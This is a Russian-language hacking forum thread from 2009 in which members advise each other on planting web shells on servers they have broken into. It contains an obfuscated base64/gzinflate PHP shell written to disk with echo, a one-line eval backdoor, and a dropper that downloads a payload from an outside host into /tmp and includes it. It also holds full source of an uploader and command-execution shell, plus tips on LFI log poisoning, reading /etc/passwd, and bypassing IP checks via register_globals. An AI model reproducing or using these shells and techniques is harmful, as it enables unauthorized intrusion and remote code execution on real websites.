Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    я так понял что ты залил '<?php eval($_GET[cmd]);?>' да? елси это так то пробуй залить локальный аплоад =)
     
    _________________________
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    /cte/=htap_elif;dwssap=eman_elif
    /cte/ это /etc/ задом на перед
    =htap_elif; просто чтобы было
    dwssap это passwd наоборот
    eman_elif чтобы было
    другими словами
    /cte/=htap_elif;dwssap=eman_elif это file_name=passwd;file_path=/etc/ только задом на перед
     
    1 person likes this.
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    HAXTA4OK, как мне его залить? о_0 Все функции заливки запрещены. Удаленный инклюд не пашет.
     
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    так ты мне скажи что у тебя вообще щас там есть из твоего что ты залил?


    P.S если щас речь про <php eval> то !

    КАК ТЫ ЗАЛИВАЛ ЭТОТ ЕВАЛ КОД ЧЕРЕЗ into+outfile , точно так же , только вместо <php eval> лей форму локального аплоада!!!
     
    _________________________
  5. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда:
    Code:
    echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZRkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6vooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnAC4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9fAymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80ySsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsReT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLKPazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQAfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51FhRagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUri0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZvPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bicEE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTdKWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1yun1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96SwbYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1OtFiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOnLWeX7VA718="))); ?>' > shell.php
    согласен с постом выше, всегда так делал, всегда прокатывало.
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Кто вам вообще сказал, что у него шелл или инъекция? МБ он через SSH залить хочет, но все ф-ции заливки не работают.
     
  7. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...
     
  8. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Ппц гуру, где твоя хакерская догадка, откуда он знает что нет качалок, в ssh не работает echo?, в ssh проще уже через ftp клиент подцепить его.
     
  9. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Размер етого шелла- 3.8кб, ради интереса посмотрел, криптованый-1.9КБ, если что-то может помешать то ето Warning: gzinflate(), но ето бывает 2:10

    Есть испольнения комманд и аплоадер файлов.
     
    #8209 The_HuliGun, 29 Jul 2009
    Last edited: 29 Jul 2009
    1 person likes this.
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Выполняю команды через логи. Проверил все мне известные, нифига. Сейчас попробую то, что вы тут насоветывали ;)
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    which wget... which lynx, etc...
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    твою ж мать =\
    Fatal error: Call to undefined function: gzinflate() in
    А без него разумеется не хочет...
     
    #8212 Tigger, 29 Jul 2009
    Last edited: 29 Jul 2009
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    ну праильно, судя по тому, что качалок нет - можно было понять что присутствие gzinflate маловероятно ))
    лей обычный шелл.
     
    1 person likes this.
  14. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    в смысле лить обычный шелл? у меня есть LFI, нашел логи, там выполнял команды... в смысле лить обычный шелл? о_0
     
    1 person likes this.
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Tigger
    allow_url_fopen on\off ?

    copy() никто не отменял
     
  16. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Я еще пользовался такой фишкой, когда небыло качалок и удаленных инклудов:
    Code:
    <?php
    if (isset($_GET[p]))
    {
     $f=fopen('/tmp/qwerty','w+');
     fwrite($f,file_get_contents('http://www.youhost/upl.inc'));
    }
    include('/tmp/qwerty');
    ?>
    
    Надеюсь понятно. залей на хост upl.inc, той что я тебе советол через echo, и етот скрипт через есho бросай на серв, дожно проканать=)

    В том аплоадере просто хтмл код, нужно было закриптовать.., а так посредствами php можно будет стянуть и проинклудить локально.
    shell.php?p

    По теме, пускай буде, если вдруг кому нибудь пригодится. Больше ничем не могу помочь по даному вопросу.
    upl.inc:
    Code:
    <html>
    <head>
    <title>uploader</title>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <style type="text/css">
    <!--
    body {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}
    a {  color: #000000; text-decoration: none}
    a:hover {  color: #000066; text-decoration: underline}
    -->
    </style>
    </head>
    
    <body bgcolor="#999999" text="#000000">
    <center>
      <table width="700" border="0" bgcolor="#000066">
        <tr>
          <td>
            <table width="100%" border="0" bgcolor="#CCCCCC">
              <tr>
                <td>
                  <p><font size="2"><b><font color="#FF0000">&nbsp;&nbsp;&nbsp;System:
                    <font color="#000000">
                    <? passthru("uname -a"); ?>
                    </font><br>
                    &nbsp;&nbsp;&nbsp;Our permissions: <font color="#000000">
                    <? passthru("id"); ?>
                    </font><br>
                    &nbsp;&nbsp;&nbsp;Our locality: <font color="#000000">
                    <? passthru("pwd"); ?>
                    </font></font></b></font></p>
    
    <pre>
    <?php
    
    // FILE UPLOAD
    $uploaded = $_FILES['userfile']['tmp_name'];
    if (file_exists($uploaded)) {
       $pwd_dir = $_POST['dira'];
       $real = $_FILES['userfile']['name'];
       $destination = $pwd_dir."/".$real;
       copy($uploaded, $destination);
       echo "Uploaded process:";
       print_r ($_FILES);
       echo "FILE UPLOADED TO $destination";
    } else {
        echo "&nbsp;&nbsp;No file uploaded";
    }
    ?>     </pre> <form name="form1" method="post" enctype="multipart/form-data">
                    <table width="100%" border="0">
                      <tr>
                        <td width="35%"><font size="2"><b>&nbsp;&nbsp;Browse file
                          to upload:</b></font></td>
                        <td width="65%">
                          <input type="file" name="userfile" size="45">
                        </td>
                      </tr>
                      <tr>
                        <td width="35%"><b><font size="2">&nbsp;&nbsp;Destination:</font></b></td>
                        <td width="65%">
                          <input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>">
                          <input type="submit" name="submit2" value="upload">
                        </td>
                      </tr>
                      <tr>
                        <td width="35%">
                          <div align="right"> </div>
                        </td>
                        <td width="65%">&nbsp; </td>
                      </tr>
                      <tr>
                        <td width="35%"><b><font size="2">&nbsp;&nbsp;Command to execute:</font></b></td>
                        <td width="65%">
                          <input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>">
                          <input type="submit" name="submit" value="execute">
                        </td>
                      </tr>
                      <tr>
                        <td width="35%">
                          <div align="right"> </div>
                        </td>
                        <td width="65%">&nbsp; </td>
                      </tr>
                    </table>
                  </form>
                  <p>
                              <pre>
                              <?
                              // command output
                                    if ($_POST['cmd']){
                              $cmd = stripslashes($_POST['cmd']);
                              echo "$cmd executed...<br>";
                              passthru("$cmd");
                              }
                              else {
                              echo "No shell command executed";
                              }
    
                              ?></pre>
    
    
    
                  <div align="right"> <font size="1"><b>2003 &copy; </b></font> </div>
                </td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </center>
    </body>
    </html>
    
     
    #8216 The_HuliGun, 29 Jul 2009
    Last edited: 29 Jul 2009
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...

    Хулиган, тебя я немного не понял.
     
  18. The_HuliGun

    The_HuliGun Elder - Старейшина

    Joined:
    19 May 2007
    Messages:
    191
    Likes Received:
    84
    Reputations:
    11
    Заливай upl.inc на левый хост
    Через echo заливай етот скрипт
    Code:
    <?php
    if (isset($_GET[p]))
    {
     $f=fopen('/tmp/qwerty','w+');
     fwrite($f,file_get_contents('http://www.левый-хост/upl.inc'));
    }
    include('/tmp/qwerty');
    ?>
    
    потом
    shell.php?p
     
    #8218 The_HuliGun, 29 Jul 2009
    Last edited: 29 Jul 2009
  19. Flair

    Flair Member

    Joined:
    7 May 2009
    Messages:
    36
    Likes Received:
    13
    Reputations:
    9
    есть админка, вроде самописная, так же имеется логин и пас к ней, но при попытке войти выдает что нельзя зайти с данного ip.
    Вопрос как возможно обойти ето дрянь, можно ли подменить IP на IP администратора сайта
     
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Экстрасенсов здесь нет. Мы не знаем каким способом проверяется IP. Если типа
    PHP:
    #....
    if($_SERVER['REMOTE_ADDR']==$trueip)
    $welcome=true; else
    $welcome=false;
    #....
    Не подменить никак...
    Ну а если включены регистер_глобался, т.е. ключ => значение массива $_GLOBALS будет равно названию => значению переменной, и IP берется с названия этой переменной, тогда просто в GET/POST/COOKIE подставь ip(название переменной)=0.0.0.0(админский IP).

    Повторю, экстрасенсов здесь нет.
     
    #8220 mailbrush, 29 Jul 2009
    Last edited: 29 Jul 2009
Thread Status:
Not open for further replies.